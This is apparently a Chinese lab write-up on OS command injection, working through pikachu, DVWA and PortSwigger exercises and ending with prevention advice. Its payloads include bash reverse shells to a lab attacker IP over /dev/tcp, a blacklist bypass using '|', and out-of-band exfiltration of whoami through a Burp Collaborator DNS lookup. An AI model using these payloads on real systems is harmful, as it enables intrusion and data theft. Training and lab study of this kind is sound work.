IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> RCE基本原理(remote command/code execute) -> 正文阅读

[PHP知识库]RCE基本原理(remote command/code execute)

RCE基本原理(remote command/code execute)

在这里插入图片描述

什么是操作系统命令注入?

操作系统命令注入(也称为 shell 注入)是一种 Web 安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统 (OS) 命令,并且通常会完全破坏应用程序及其所有数据。很多时候,攻击者可以利用操作系统命令注入漏洞来破坏托管基础设施的其他部分,利用信任关系将攻击转向组织内的其他系统。

类型效果
command1 & command2command1与command2同时执行,不管command 1是否执行成功
command1 && command2先执行command1,如果为真,再执行command2
command1 | command2只执行command2
command1 || command2先执行command1,如果为假,再执行command2

pikachu

ping

if (isset($_POST['submit']) && $_POST['ipaddress'] != null) {
    $ip = $_POST['ipaddress'];
    //     $check=explode('.', $ip);可以先拆分,然后校验数字以范围,第一位和第四位1-255,中间两位0-255
    if (stristr(php_uname('s'), 'windows')) {
        //         var_dump(php_uname('s'));
        $result .= shell_exec('ping ' . $ip); //直接将变量拼接进来,没做处理
    } else {
        $result .= shell_exec('ping -c 4 ' . $ip);
    }
}

正常使用
在这里插入图片描述

可以保存文件

127.0.0.1| ipconfig > 1.txt

在这里插入图片描述

linux可以 利用RCE漏洞写一个bash反弹脚本:

centos8 192.168.100.131
kali 192.168.100.133

1| echo "1234" > 1.sh

φ(゜▽゜*)? φ(゜▽゜*)? φ(゜▽゜*)? φ(゜▽゜*)? bash结合重定向方法的一句话

1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh
nc -lvp 4444
1 | bash /tmp/1.sh

在这里插入图片描述

evel

$html = '';
if (isset($_POST['submit']) && $_POST['txt'] != null) {
    if (@!eval($_POST['txt'])) {
        $html .= "<p>你喜欢的字符还挺奇怪的!</p>";
    }
}

这个就更方便了

system('pwd');

在这里插入图片描述

观察源码可直接用一句话木马连接

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

利用RCE漏洞写一个bash反弹脚本:

centos8 192.168.100.131
kali 192.168.100.133

system("echo 'bash -i >& /dev/tcp/192.168.100.133/1234 0>&1' | bash");
nc -nvlp 1234

在这里插入图片描述

在这里插入图片描述

dvwa

low

同pikachu ping

1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh

medium

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

只是替换了部分 同pikachu ping

1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh

high

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

开发者在“| ”后面加了个空格,因此我们还是能够用 “|” 连接符进行绕过。同pikachu ping

1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh

Impossible

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

对参数 ip 进行了严格的限制,只有“数字.数字.数字.数字”的输入才会被接收执行, 加入了 Anti-CSRF token 进行进一步保障,使得命令注入漏洞不存在。

Portswigger

在这里插入图片描述

具有时间延迟的盲操作系统命令注入

应用程序执行一个包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。

在这里插入图片描述

name=admin&email=123456%40qq.com||ping -c 10 127.0.0.1||&subject=1&message=1

该ping命令是执行此操作的有效方法,命令将导致应用程序在 10 秒内 ping 其环回网络适配器。

带有输出重定向的盲操作系统命令注入

该应用程序从该位置为产品目录提供图像。您可以将注入命令的输出重定向到此文件夹中的文件,然后使用图像加载 URL 检索文件的内容。

本实验有一个图片文件夹

/var/www/images/

图片路径

https://ac721f891f1fa408c0be0c78008700df.web-security-academy.net/image?filename=36.jpg

注入方法

name=admin&email=123456%40qq.com||dir>/var/www/images/output.txt||&subject=1&message=1

查看结果

https://ac721f891f1fa408c0be0c78008700df.web-security-academy.net/image?filename=output.txt

在这里插入图片描述

带外数据泄露的盲操作系统命令注入

通过用 nslookup DNS 查询将输出泄露到 Burp Collaborator

注入方法

name=admin&email=123456%40qq.com||nslookup `whoami`.li752zu6b0m9bfw7kg0v5xc3wu2kq9.burpcollaborator.net||&subject=1&message=1

在这里插入图片描述

peter-NqSY9R 即为 whoami 结果

如何防止操作系统命令注入攻击

到目前为止,防止操作系统命令注入漏洞的最有效方法是永远不要从应用层代码调用操作系统命令。几乎在每种情况下,都存在使用更安全的平台 API 实现所需功能的替代方法。

如果认为使用用户提供的输入调用操作系统命令是不可避免的,则必须执行强输入验证。有效验证的一些示例包括:

  • 根据允许值的白名单进行验证。
  • 验证输入是否为数字。
  • 验证输入仅包含字母数字字符,不包含其他语法或空格。

永远不要试图通过转义 shell 元字符来清理输入,在实践中,这太容易出错并且容易被熟练的攻击者绕过。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-08 22:08:09  更:2022-03-08 22:08:33 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 16:08:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计